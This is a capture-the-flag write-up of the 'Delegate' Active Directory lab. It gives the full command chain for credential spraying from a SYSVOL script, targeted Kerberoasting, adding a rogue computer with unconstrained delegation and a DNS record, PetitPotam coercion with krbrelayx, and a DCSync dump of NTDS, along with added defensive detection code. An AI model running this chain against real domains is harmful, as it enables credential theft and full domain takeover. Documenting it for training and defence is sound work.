
Machine (Medium) - Delegate

Writeup for Delegate, a medium-difficulty Windows Active Directory machine by geiseric. The path involves extracting a credential from a login script in SYSVOL, escalating through a GenericWrite right and a targeted Kerberoast, and then abusing the delegation privileges of the resulting user: a new computer account is marked for unconstrained delegation through its UAC flags and given an attacker-controlled DNS record, so that a coerced Domain Controller authentication yields a DC ticket that is used to dump the NTDS database.

Writeup Author: BobBuilder


Objective: Escalate from a leaked login script credential to full domain compromise using delegation and coercion techniques.

Category: Machine
Difficulty: Medium
Platform: Windows
Machine Author: geiseric


User

Step 1: Enumerate SPNs and SMB Shares

We first attempt to enumerate SPNs with the guest account and a user list:

impacket-GetUserSPNs -target-domain delegate.vl -usersfile users_delegate.vl.txt -dc-ip <delegate_ip> delegate.vl/guest:'' -no-pass

We then enumerate SMB shares and recursively download every readable file with the spider_plus module:

nxc smb <delegate_ip> -u guest -p '' -M spider_plus -o DOWNLOAD_FLAG=true

Step 2: Discover Credentials in SYSVOL Login Script

Among the downloaded files from SYSVOL is a login script:

sysvol/delegate.vl/scripts/users.bat

The batch script contains a hardcoded password in a net use command; as the spray below shows, it is the password of user A.Briggs:

net use h: \\fileserver\backups /user:Administrator [REDACTED_PASSWORD_1]

Using the recovered password, we spray it against the user list to find which account it belongs to:

nxc smb <delegate_ip> -u users_delegate.vl.txt -p '[REDACTED_PASSWORD_1]' --shares --continue-on-success

Valid credentials:

A.Briggs:[REDACTED_PASSWORD_1]
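
SYSVOL is readable by every authenticated domain user, so a password in a logon script is effectively public. The following added Python audit (my example, not code from the writeup or from any tool it uses) scans a downloaded copy of SYSVOL scripts, such as what the spider_plus module writes to disk, for embedded credentials in net use lines and in ConvertTo-SecureString -AsPlainText calls, and reports the user and the length of the secret without echoing the secret itself. The sample scripts and passwords are constructed placeholders, not the real contents of the box.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample scripts standing in for a downloaded SYSVOL copy.
# The passwords are placeholders, not the real ones from the machine.
SAMPLE_SCRIPTS: Dict[str, str] = {
    "sysvol/delegate.vl/scripts/users.bat":
        "@echo off\r\n"
        "net use h: \\\\fileserver\\backups /user:Administrator P@ssw0rd-PLACEHOLDER\r\n",
    "sysvol/delegate.vl/scripts/clean.bat":
        "@echo off\r\n"
        "net use h: \\\\fileserver\\backups /persistent:yes\r\n"
        "net use i: \\\\fileserver\\tools /user:svc *\r\n",
    "sysvol/delegate.vl/scripts/mount.ps1":
        "$sec = ConvertTo-SecureString 'Hunter2-PLACEHOLDER' -AsPlainText -Force\r\n",
}

NET_USE_RE = re.compile(r"^\s*net\s+use\b(.*)$", re.IGNORECASE)
SECURESTRING_RE = re.compile(
    r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"]\s+-AsPlainText", re.IGNORECASE)


def net_use_credential(line: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) if a 'net use' line embeds a password.

    Both Windows forms are handled:
      net use X: \\\\srv\\share /user:DOM\\user password
      net use X: \\\\srv\\share password /user:DOM\\user
    A '*' in the password position means 'prompt', so nothing is embedded.
    """
    m = NET_USE_RE.match(line)
    if not m:
        return None
    user = secret = None
    for tok in m.group(1).split():
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("/") or tok.startswith("\\\\") or tok.endswith(":") or tok == "*":
            continue  # switch, UNC path, drive letter, or interactive prompt
        else:
            secret = tok
    return (user, secret) if user and secret else None


def scan_script(path: str, text: str) -> List[Dict[str, object]]:
    """Report embedded credentials in one script without printing the secret."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        cred = net_use_credential(line)
        if cred:
            user, secret = cred
            findings.append({"file": path, "line": lineno, "kind": "net use",
                             "user": user, "secret_len": len(secret)})
        for m in SECURESTRING_RE.finditer(line):
            findings.append({"file": path, "line": lineno, "kind": "ConvertTo-SecureString",
                             "user": None, "secret_len": len(m.group(1))})
    return findings


def audit_scripts(scripts: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan every script in a {path: contents} map (e.g. built by walking a SYSVOL download)."""
    findings: List[Dict[str, object]] = []
    for path, text in scripts.items():
        findings.extend(scan_script(path, text))
    return findings


if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_SCRIPTS):
        print(f"{f['file']}:{f['line']} {f['kind']} user={f['user']} "
              f"({f['secret_len']}-char password embedded)")
```

The scan treats a bare `*` as a prompt rather than a password, so only scripts that would work non-interactively are flagged; the fix on the defender side is to replace such mappings with Group Policy Preferences drive maps or a gMSA-backed scheduled task rather than a literal password.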

Step 3: BloodHound Analysis – A.Briggs Has GenericWrite

User A.Briggs has GenericWrite over user N.Thompson, who is a member of:

  • Remote Management Users
  • Delegation Admins

Step 4: Attempt Shadow Credentials Attack (Fails)

We try a Shadow Credentials attack against N.Thompson, using the GenericWrite right to add a key credential:

bloodyAD.py --host <delegate_ip> -d delegate.vl -u 'A.Briggs' -p '[REDACTED_PASSWORD_1]' add shadowCredentials n.thompson

This fails because the domain does not support PKINIT, so the added key credential cannot be used to authenticate.

Step 5: Kerberoasting N.Thompson

Using the same GenericWrite right, targetedKerberoast.py adds a temporary SPN to N.Thompson, requests a service ticket for it, and then restores the attribute:

targetedKerberoast.py -u 'A.Briggs' -p '[REDACTED_PASSWORD_1]' --request-user N.Thompson -d delegate.vl

Crack the TGS-REP hash with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23):

hashcat -m 13100 hashes.txt custom_wordlist.txt

Recovered credentials:

N.Thompson:[REDACTED_PASSWORD_2]
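
The detection side of this step, as an added example that is not part of the writeup: a targeted Kerberoast shows up on the Domain Controller as a 4769 (service ticket requested) event with RC4 encryption (type 0x17) for a user account, typically one that had no SPN until moments before. The Python below (my code, not from any tool the writeup uses) runs that logic over constructed, pre-parsed 4769 events; real events carry the same fields as strings, so a parser for the Windows XML format would sit in front of this.

```python
from typing import Dict, Iterable, List, Set, Tuple

# "Ticket Encryption Type" values as logged in event 4769.
RC4_HMAC = 0x17
AES128_CTS = 0x11
AES256_CTS = 0x12

# Constructed, simplified 4769 events (already parsed into fields); not real DC logs.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"account": "A.Briggs@DELEGATE.VL", "service": "DC1$", "etype": AES256_CTS, "client": "10.0.0.50"},
    {"account": "A.Briggs@DELEGATE.VL", "service": "N.Thompson", "etype": RC4_HMAC, "client": "10.0.0.50"},
    {"account": "J.Doe@DELEGATE.VL", "service": "krbtgt", "etype": AES256_CTS, "client": "10.0.0.21"},
    {"account": "WS01$@DELEGATE.VL", "service": "DC1$", "etype": RC4_HMAC, "client": "10.0.0.31"},
]


def is_kerberoast_candidate(ev: Dict[str, object]) -> bool:
    """RC4 service ticket for a user (non-machine, non-krbtgt) account.

    Machine accounts have random 120-character passwords and krbtgt is never
    roastable in practice, so RC4 tickets to those are noise for this rule.
    """
    service = str(ev["service"])
    if service.endswith("$") or service.lower() == "krbtgt":
        return False
    return ev["etype"] == RC4_HMAC


def kerberoast_candidates(events: Iterable[Dict[str, object]]) -> List[Tuple[str, str]]:
    """(requesting account, targeted service account) pairs worth a look."""
    return [(str(ev["account"]), str(ev["service"]))
            for ev in events if is_kerberoast_candidate(ev)]


def unexpected_spn_targets(events: Iterable[Dict[str, object]],
                           known_service_accounts: Set[str]) -> List[str]:
    """Targeted roasts hit accounts that were never meant to carry an SPN.

    Compare the roasted service accounts against a baseline of legitimate
    SPN-bearing users; anything outside it likely gained its SPN via a write
    right (event 5136 on servicePrincipalName would confirm the write).
    """
    seen: List[str] = []
    for _, service in kerberoast_candidates(events):
        if service not in known_service_accounts and service not in seen:
            seen.append(service)
    return seen


if __name__ == "__main__":
    # Constructed baseline: the only user account expected to hold an SPN.
    baseline = {"svc_sql"}
    for account, service in kerberoast_candidates(SAMPLE_EVENTS):
        print(f"RC4 service ticket for user SPN {service} requested by {account}")
    for service in unexpected_spn_targets(SAMPLE_EVENTS, baseline):
        print(f"{service} is not a known service account: check who added its SPN")
```

The RC4 rule on its own has false positives in domains where legacy RC4 is still permitted for user accounts; the SPN baseline comparison is the stronger signal for the targeted variant, and enforcing AES-only (msDS-SupportedEncryptionTypes) on service accounts removes the cheap-to-crack hash from the picture.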

Step 6: Shell Access with Evil-WinRM

evil-winrm -i delegate.vl -u 'N.Thompson' -p '[REDACTED_PASSWORD_2]'

Root

Step 1: Check Privileges

whoami /all

N.Thompson holds two notable privileges:

  • SeEnableDelegationPrivilege
  • SeMachineAccountPrivilege

Step 2: Create a New Computer Account for Delegation Abuse

SeMachineAccountPrivilege lets N.Thompson add a computer account to the domain:

addcomputer delegate.vl/N.Thompson:'[REDACTED_PASSWORD_2]' -computer-name newpc1 -computer-pass password1 -dc-host dc1.delegate.vl

Step 3: Add a DNS Record Pointing to the Attacker

Add a DNS record so that the new computer's name resolves to the attacker host, then confirm the resolution:

dnstool.py -u 'delegate.vl\newpc1$' -p password1 -r newpc1.delegate.vl -d <attacker_ip> --action add -dns-ip <delegate_ip> dc1.delegate.vl
nslookup newpc1.delegate.vl <delegate_ip>

Step 4: Configure Delegation Flags and SPN

Because N.Thompson holds SeEnableDelegationPrivilege, the account can set the TRUSTED_FOR_DELEGATION flag (unconstrained delegation) on the new computer:

bloodyAD.py --host <delegate_ip> -d delegate.vl -u 'N.Thompson' -p '[REDACTED_PASSWORD_2]' add uac 'newpc1$' -f TRUSTED_FOR_DELEGATION

Add a CIFS SPN for the new computer's name, so that a client connecting to it by name obtains a service ticket for this account:

addspn.py -u 'delegate.vl\N.Thompson' -p '[REDACTED_PASSWORD_2]' -t 'newpc1$' -s 'CIFS/newpc1$.delegate.vl' -a delegate.vl

Verify with PowerView (powerview.py), then run the query at its PV > prompt:

powerview.py delegate.vl/N.Thompson:'[REDACTED_PASSWORD_2]'@<delegate_ip> --use-ldap
PV > Get-DomainComputer -Properties servicePrincipalName
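
What a defender would look for after this step, as an added example that is not part of the writeup: the TRUSTED_FOR_DELEGATION bit set on a computer object that is not a Domain Controller, and an SPN whose host part does not match the computer's dNSHostName. The Python below (my code, not from PowerView or any other tool named here) decodes userAccountControl and runs both checks over constructed records modelled on this scenario; in practice the records would come from an LDAP export of computer objects.

```python
from typing import Dict, List

# userAccountControl bit names (values from the Active Directory schema).
UAC_FLAGS: Dict[int, str] = {
    0x0001: "SCRIPT", 0x0002: "ACCOUNTDISABLE", 0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT", 0x0020: "PASSWD_NOTREQD", 0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED", 0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT", 0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT", 0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD", 0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED", 0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED", 0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH", 0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION", 0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
TRUSTED_FOR_DELEGATION = 0x80000
DC_PRIMARY_GROUPS = {516, 521}  # Domain Controllers, Read-only Domain Controllers

# Constructed computer records modelled on the scenario above; not real directory data.
RECORDS: List[Dict[str, object]] = [
    {"sAMAccountName": "DC1$", "dNSHostName": "dc1.delegate.vl", "primaryGroupID": 516,
     "userAccountControl": 0x2000 | 0x80000,
     "servicePrincipalName": ["CIFS/dc1.delegate.vl", "CIFS/DC1"]},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.delegate.vl", "primaryGroupID": 515,
     "userAccountControl": 0x1000,
     "servicePrincipalName": ["HOST/ws01.delegate.vl"]},
    {"sAMAccountName": "NEWPC1$", "dNSHostName": "newpc1.delegate.vl", "primaryGroupID": 515,
     "userAccountControl": 0x1000 | 0x80000,
     "servicePrincipalName": ["CIFS/newpc1$.delegate.vl"]},
]


def decode_uac(value: int) -> List[str]:
    """Names of the bits set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def spn_host(spn: str) -> str:
    """Host part of an SPN of the form service/host[:port][/instance]."""
    if "/" not in spn:
        return spn
    return spn.split("/", 1)[1].split("/", 1)[0].split(":", 1)[0]


def audit_delegation(records: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Map sAMAccountName -> reasons for every computer that deserves a look.

    Domain Controllers are trusted for unconstrained delegation by design, so
    the UAC check excludes them by primary group rather than by name.
    """
    findings: Dict[str, List[str]] = {}
    for rec in records:
        sam = str(rec["sAMAccountName"])
        uac = int(rec["userAccountControl"])
        reasons: List[str] = []
        if uac & TRUSTED_FOR_DELEGATION and rec["primaryGroupID"] not in DC_PRIMARY_GROUPS:
            reasons.append("TRUSTED_FOR_DELEGATION (unconstrained) set on a non-DC account")
        short = sam.rstrip("$").lower()
        fqdn = str(rec.get("dNSHostName", "")).lower()
        for spn in rec.get("servicePrincipalName", []):
            host = spn_host(str(spn)).lower()
            if host not in (short, fqdn):
                reasons.append(f"SPN host {host!r} does not match dNSHostName {fqdn!r}")
        if reasons:
            findings[sam] = reasons
    return findings


if __name__ == "__main__":
    for sam, reasons in audit_delegation(RECORDS).items():
        print(f"{sam}: {', '.join(reasons)}")
        uac = next(int(r["userAccountControl"]) for r in RECORDS if r["sAMAccountName"] == sam)
        print(f"  userAccountControl = {uac:#x} -> {decode_uac(uac)}")
```

The same query is what an alert on Directory Service changes should key on: a write to userAccountControl that turns on 0x80000 outside the Domain Controllers OU, and an SPN write on a freshly created computer object, are both recorded as 5136 events when object auditing is enabled.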

Step 5: Coerce Authentication via PetitPotam

Set up krbrelayx. It uses the computer account's Kerberos key, derived from the salt and password given here, to decrypt the incoming AP-REQ; because newpc1$ is trusted for unconstrained delegation, the authentication it receives from the DC carries a forwardable TGT for DC1$, which krbrelayx writes to a ccache file:

krbrelayx.py --krbsalt 'delegate.vl\newpc1$' --krbpass password1 -dc-ip <delegate_ip> -v dc1

Trigger the coercion: PetitPotam makes the DC authenticate to newpc1.delegate.vl, which now resolves to the attacker host:

PetitPotam.py -u 'N.Thompson' -p '[REDACTED_PASSWORD_2]' -d delegate.vl 'newpc1.delegate.vl' dc1.delegate.vl

Step 6: Dump Domain Hashes with Delegated Ticket

Use the delegated DC1$ ticket to replicate the domain secrets from the NTDS database (secretsdump with -just-dc uses the directory replication service, i.e. DCSync):

export KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'
secretsdump.py -just-dc dc1.delegate.vl -k -no-pass